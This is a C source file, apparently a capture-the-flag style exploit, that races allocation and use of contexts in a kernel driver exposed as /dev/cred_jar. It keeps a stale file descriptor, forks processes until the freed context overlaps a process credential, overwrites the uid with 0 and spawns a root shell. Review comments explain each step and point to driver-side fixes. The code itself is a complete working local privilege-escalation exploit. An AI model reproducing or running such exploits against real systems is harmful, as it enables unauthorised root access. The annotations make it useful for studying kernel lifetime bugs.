exploit for cred_jar
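#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <pthread.h>

/*
 * ioctl request numbers used against /dev/cred_jar.
 * _IO() encodes neither an argument size nor a direction, so the kernel's
 * generic ioctl layer gives the driver no help validating the argument;
 * any checking has to happen inside the driver's own handler.
 * NOTE(review): the per-request meanings are only implied by the names and
 * by how this file calls them; the driver source is not shown here.
 */
#define ALLOC_CTX _IO('t', 1)
#define USE_CTX   _IO('t', 2)
#define GET_ID    _IO('t', 3)
#define SET_ID    _IO('t', 4)

/*
 * race_stop:  set to 1 by get() once it sees an unexpected id; both worker
 *             loops poll it as their exit condition.
 * race_start: declared but never read or written in this file.
 * NOTE(review): volatile only prevents the compiler from caching the flag;
 * it is not a synchronisation primitive (an atomic would be the usual choice).
 */
volatile int race_stop, race_start;

/* File descriptor that get() deliberately leaves open and main() reuses. */
int bug_fd;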
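/*
 * Worker thread: repeatedly opens the device, attaches the new fd to id 2
 * with USE_CTX, waits one microsecond, and reads the id back with GET_ID.
 *
 * The loop ends the first time the id read back is not 2. At that point the
 * fd is kept open (it is not closed on the break path) and published through
 * bug_fd for main() to use.
 *
 * NOTE(review): an fd attached to id 2 that later reports a different id
 * means the object behind the fd changed while the fd still referred to it.
 * Presumably the driver lets a context be released and its memory reused
 * without pinning it for fds that selected it (the driver source is not
 * shown; confirm there). The defensive fix belongs in the driver: hold a
 * reference count or lock on the context for as long as any fd points at it.
 *
 * arg is unused. Always returns NULL.
 */
void *get(void *arg)
{
    int fd, id;

    while (!race_stop) {
        /* NOTE(review): the open() result is not checked; a failed open
         * makes both ioctl() calls fail and the iteration is retried. */
        fd = open("/dev/cred_jar", O_RDWR);
        if (ioctl(fd, USE_CTX, 2) < 0)
            goto fail;
        /* Short window in which the put() thread may run. */
        usleep(1);
        if (ioctl(fd, GET_ID, &id) < 0)
            goto fail;
        if (id != 2) {
            /* Unexpected id observed: stop both threads, keep fd open. */
            race_stop = 1;
            break;
        }
fail:
        close(fd);
    }
    /* The loop is only left through the break above, so id and fd are set. */
    printf("id %x\n", id);
    bug_fd = fd;
    return NULL;
}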
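/*
 * Worker thread: until race_stop is set, opens the device, issues ALLOC_CTX
 * with a packed 64-bit argument, and closes the fd again straight away.
 *
 * The argument is (2ul << 32) | 128: the shift binds tighter than the OR, so
 * 2 lands in the upper 32 bits and 128 in the lower 32 bits.
 * NOTE(review): presumably upper half = id and lower half = a size, matching
 * the id 2 that get() selects; confirm against the driver. The expression
 * also assumes a 64-bit unsigned long, since a 32-bit shift by 32 is undefined.
 *
 * NOTE(review): neither open() nor ioctl() is checked; failures are simply
 * retried on the next iteration.
 *
 * arg is unused. Always returns NULL.
 */
void *put(void *arg)
{
    int fd;

    while (!race_stop) {
        fd = open("/dev/cred_jar", O_RDWR);
        ioctl(fd, ALLOC_CTX, 2ul << 32 | 128);
        /* Closing immediately is what makes the allocation short-lived. */
        close(fd);
    }
    return NULL;
}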
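/*
 * Entry point.
 *
 * Phase 1: start the get() and put() threads and join them. The join on t1
 * only returns once get() has stored the surviving descriptor in bug_fd.
 *
 * Phase 2: fork children in a loop. After each fork the parent reads an id
 * through bug_fd with GET_ID; when that value equals its own uid it issues
 * SET_ID with 0 and stops forking. Each child sleeps 4 seconds and then
 * checks whether getuid() has become 0; nothing in the child changes its
 * own uid before that check.
 *
 * NOTE(review): the uid comparison suggests the stale context behind bug_fd
 * can end up overlapping credential data of a freshly forked process. That is
 * inferred from the device name and this comparison, not from driver source.
 * For defenders the relevant controls are driver-side lifetime management of
 * the context and restrictive permissions on the device node.
 *
 * argc and argv are unused. Returns 0, although the final pause() normally
 * keeps the parent from getting there.
 */
int main(int argc, char **argv)
{
    pthread_t t1, t2;
    int id = 0, pid;

    /* NOTE(review): pthread_create() results are not checked. */
    pthread_create(&t1, NULL, get, NULL);
    pthread_create(&t2, NULL, put, NULL);
    sleep(1);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    sleep(1);

    while (1) {
        /* NOTE(review): fork() == -1 is not handled; it falls through to
         * the parent path below. */
        pid = fork();
        if (pid == 0) {
            /* Child: wait, then look at its own real uid. */
            sleep(4);
            if (getuid() == 0) {
                if (fork() == 0) {
                    seteuid(0);
                    system("/bin/sh");
                } else {
                    exit(0);
                }
            }
            /* Reached by children whose uid did not change, and by the
             * grandchild once system() returns. */
            pause();
        }

        /* Parent: read whatever the stale descriptor now reports. */
        ioctl(bug_fd, GET_ID, &id);
        printf("uid %x\n", id);
        if (id == getuid()) {
            ioctl(bug_fd, SET_ID, 0);
            break;
        }
        else if (id >= 0) {
            /* Non-negative but not our uid: back off before forking again. */
            sleep(2);
        }
    }

    /* Keep the parent, and with it bug_fd, alive. */
    pause();
    return 0;
}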